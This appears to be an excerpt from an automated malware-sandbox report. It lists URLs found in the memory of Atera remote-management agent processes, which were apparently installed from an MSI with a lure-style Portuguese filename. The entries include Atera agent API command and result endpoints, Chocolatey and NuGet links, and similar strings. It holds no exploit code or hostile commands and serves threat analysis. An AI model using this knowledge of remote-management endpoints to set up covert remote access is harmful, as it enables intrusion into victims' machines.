                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://somewhere123zzaafasd.invalidUAttempting
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://stackoverflow.com/a/13571471/18475
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B4181000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://stackoverflow.com/a/15281070/18475
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://stackoverflow.com/questions/265339/whats-the-best-way-to-automate-secure-ftp-in-powershell
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://stackoverflow.com/questions/518181/too-many-automatic-redirections-were-attempted-error-messa
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B4181000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://stanislavs.org/stopping-command-line-applications-programatically-with-ctrl-c-events-from-net
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://stexbar.googlecode.com/files/StExBar-1.8.3.msi
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://stexbar.googlecode.com/files/StExBar64-1.8.3.msi
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://wixtoolset.org
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/news/
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/releases/
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813430939.0000022AC0942000.00000002.00000001.01000000.00000021.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.abit.com.tw/
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmp, ChocolateyTabExpansion.ps1.53.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.000002340062A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340032E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A88217A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1450070040.000001E741015000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1450070040.000001E740FDF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477585000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C19000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234007B2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400618000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002D7000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881E77000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A2D1000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://www.gnu.org/
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmp, ChocolateyTabExpansion.ps1.53.drString found in binary or memory: http://www.jeremyskinner.co.uk/2010/03/07/using-git-with-windows-powershell/
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupexitcodes
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2270718409.00000213B3B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                                Source: AteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                                Source: AteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.oh
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B343000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B30B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B5D9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B4ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400341000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB899000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.P
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.PZ
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.Pb
                                Source: rundll32.exe, 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.aterD
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400001000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005244000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582681527.000001FD41A2F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1582648644.0000026AD2433000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881E77000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881951000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB671000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB899000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB867000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB82C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433C46000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2571688057.0000024845621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005244000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/PrhX
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A8819D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Pro
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.1582681527.000001FD41A2F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1582648644.0000026AD2433000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB867000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB82C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433C46000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234005EC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005244000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234005EC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/Acknowl
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234001D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234005EC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AcknowledgeCommands
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/Age
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.000002340008B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AgentStarting
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AgentStarting)
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.1582681527.000001FD41A2F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1582648644.0000026AD2433000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/CommandResult
                                Source: AgentPackageTicketing.exe, 00000033.00000002.2571688057.0000024845621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/CommandResultRecurring/AgentPackageTicketingInstallHelp
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetEnvironmentStatus
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400341000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurrin
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400341000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234001D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackages
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackages.
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234001D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackages.PG
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/Trace
                                Source: AgentPackageInternalPoller.exe, 00000037.00000002.2103371672.000001CC12D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/agentMonitoredDevices/3757c761-9e50-4f15-8086-0e584dcee
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB899000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/dynamic-fields/
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB671000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB899000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/dynamic-fields/script-based
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/guiComm
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB908000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/guiCommandResult
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB867000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB82C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433C46000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/recurringCommandResult
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB867000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/recurringCommandResultpf
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/thresholds/3757c761-9e50-4f15-8086-0e584dceea48
                                Source: rundll32.exe, 00000006.00000002.1359772261.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005244000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.00000000051A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/track-event
                                Source: rundll32.exe, 00000006.00000002.1359772261.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/track-event;
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.000001326286F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Alerts/AddAlertsFromAgent
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/monitoring/v1/MonitoringPackage/AddAgentMetrics
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/monitoring/v1/MonitoringPackage/AddAgentMetrics0
                                Source: AgentPackageMarketplace.exe, 0000003A.00000002.2116373812.00000165983D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/v1/Provision/scripts?operatingSystem=Windows
                                Source: AgentPackageMarketplace.exe, 0000003A.00000002.2116373812.0000016598488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/v1/Provision/sync
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234005EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.comh
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.comhJ
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.comhj
                                Source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
                                Source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?You
                                Source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
                                Source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed&gui=trueShowing
                                Source: AgentPackageTicketing.exe, 00000033.00000002.2571688057.00000248459CC000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2571688057.000002484569A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.nuget.org
                                Source: AgentPackageTicketing.exe, 00000033.00000002.2571688057.000002484569A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmpString found in binary or memory: https://api.nuget.org/v3-flatcontainer/eo.webbrowser/24.1.46/eo.webbrowser.24.1.46.nupkg
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://bit.ly/1duJ9bM).
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://bit.ly/1g0R3Os).
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://bitbucket.org/jonforums/uru)
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://ch0.co/moderation
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://ch0.co/nexus2apikey).
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://ch0.co/packages_config
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://chocolatey.org).
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chocolatey.org/
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://chocolatey.org/9https://push.chocolatey.org/Chttps://community.chocolatey.org/Qhttps://commu
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B4ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chocolatey.org/compare
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://chocolatey.org/compare.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chocolatey.org/compare0f
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chocolatey.org/compare2G
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chocolatey.org/compareSystem.String
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://chocolatey.org/comparekThis
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://chocolatey.org/contact.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://community.chocolatey.org)
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B72D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B72D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/8
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/P
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B470000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B5D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/h
